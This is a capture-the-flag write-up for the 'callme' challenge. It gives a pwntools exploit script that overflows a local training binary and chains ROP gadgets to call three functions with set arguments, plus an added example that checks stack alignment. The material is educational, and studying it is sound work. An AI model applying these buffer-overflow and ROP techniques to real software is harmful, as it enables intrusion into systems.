Callme

There is not much to say about this challenge: find the gadgets and build the chain. The only catch is stack alignment, noted in the script below.

Environment: Ubuntu 18.04, pwntools (Python 3)

exp.py

from pwn import *

elf = context.binary = ELF('callme')   # the challenge binary

#info('%#x system', elf.symbols.system)

io = process(elf.path)

gadget = p64(0x401ab0)   # pop rdi ; pop rsi ; pop rdx ; ret
ret_ad = p64(0x401ab3)   # the trailing ret of the same gadget, used only to realign rsp

ca_one = p64(0x401850)   # callme_one
ca_two = p64(0x401870)   # callme_two
ca_thr = p64(0x401810)   # callme_three

arg_st = p64(1)
arg_nd = p64(2)
arg_rd = p64(3)

arg_al = arg_st + arg_nd + arg_rd   # rdi = 1, rsi = 2, rdx = 3

callThem = ret_ad + gadget + arg_al
# On Ubuntu 18.04 ret_ad is mandatory: without it rsp is not 16-byte aligned when
# callme_* calls into libc, a movaps faults there, and the flag is never printed.

payload = b'A' * 40   # padding up to the saved return address
payload += callThem + ca_one
payload += callThem + ca_two
payload += callThem + ca_thr

io.sendline(payload)

io.recvuntil(b'> ')
flag = io.recvall()
print('FLAG: ' + flag.decode())
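Why the lone `ret` is needed can be checked without running the binary. The following is an added example, not part of the original write-up: it builds the same payload layout as the script above with and without `ret_ad`, then replays how much stack each chain element consumes and reports `rsp % 16` at the moment each `callme_*` is entered. Assumptions are stated in the comments: the addresses are the ones used above, `0x401ab0` is `pop rdi ; pop rsi ; pop rdx ; ret` with `0x401ab3` its trailing `ret` (as in the script), and the SysV ABI places the overwritten return address at `rsp % 16 == 8` because `pwnme` was reached through a `call`. A function entry needs `rsp % 16 == 8` (so that `rsp + 8` is 16-byte aligned); anything else makes the `movaps` instructions inside libc fault. The function names `build_chain` and `entry_alignments` are hypothetical helpers written for this example.

```python
import struct

# Addresses copied from the exploit above. Gadget semantics are an assumption
# (they match the callme binary the write-up targets):
#   0x401ab0: pop rdi ; pop rsi ; pop rdx ; ret
#   0x401ab3: ret  (the trailing ret of the same gadget)
POP3_RET = 0x401ab0
RET = 0x401ab3
CALLME_ONE, CALLME_TWO, CALLME_THREE = 0x401850, 0x401870, 0x401810
TARGETS = (CALLME_ONE, CALLME_TWO, CALLME_THREE)
PADDING = 40


def p64(value):
    """Little-endian 8-byte pack, the same as pwntools' p64."""
    return struct.pack('<Q', value)


def build_chain(align, args=(1, 2, 3), padding=PADDING):
    """Padding, then per call: [ret] + pop3 gadget + three args + callme_N.

    align=True reproduces the write-up's payload; align=False drops ret_ad.
    """
    chain = b'A' * padding
    for target in TARGETS:
        if align:
            chain += p64(RET)             # realign rsp before the gadget
        chain += p64(POP3_RET) + b''.join(p64(a) for a in args)
        chain += p64(target)
    return chain


def entry_alignments(chain, padding=PADDING, ret_slot=0x7fffffffe018):
    """Replay the chain's stack consumption after pwnme's `ret`.

    ret_slot is the address of the overwritten return address. The SysV ABI
    puts it at rsp % 16 == 8 (pwnme was entered via `call`; `leave` restores
    rsp to that value). Returns rsp % 16 at each callme_* entry; 8 is correct.
    The model only tracks stack words consumed by each chain element: a `ret`
    pops one word, the pop3 gadget pops three words plus its own `ret`, and a
    called function is a black box that returns by popping the word after it.
    """
    assert ret_slot % 16 == 8, 'return-address slot must sit at rsp % 16 == 8'
    words = [struct.unpack('<Q', chain[off:off + 8])[0]
             for off in range(padding, len(chain), 8)]
    i, rsp = 0, ret_slot + 8              # pwnme's ret popped words[0]
    alignments = []
    while i < len(words):
        word = words[i]
        if word == RET:
            i, rsp = i + 1, rsp + 8       # ret pops the next word and jumps to it
        elif word == POP3_RET:
            rsp += 3 * 8                  # pop rdi ; pop rsi ; pop rdx
            i, rsp = i + 4, rsp + 8       # then ret (skip the three arg words)
        elif word in TARGETS:
            alignments.append(rsp % 16)   # state at callme_N entry
            i, rsp = i + 1, rsp + 8       # callme_N returns via ret later
        else:
            raise ValueError('control reached a non-gadget word %#x' % word)
    return alignments


if __name__ == '__main__':
    for align in (True, False):
        print('with ret_ad' if align else 'without ret_ad',
              entry_alignments(build_chain(align)))
```

With `ret_ad` every `callme_*` is entered at `rsp % 16 == 8`; without it the first and third entries land on a 16-byte boundary, which is the state that makes the libc calls inside them crash, so the chain dies inside `callme_one` before anything is printed. The same walk generalises to any chain: add a `ret` wherever the replay shows a function entry at residue 0.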
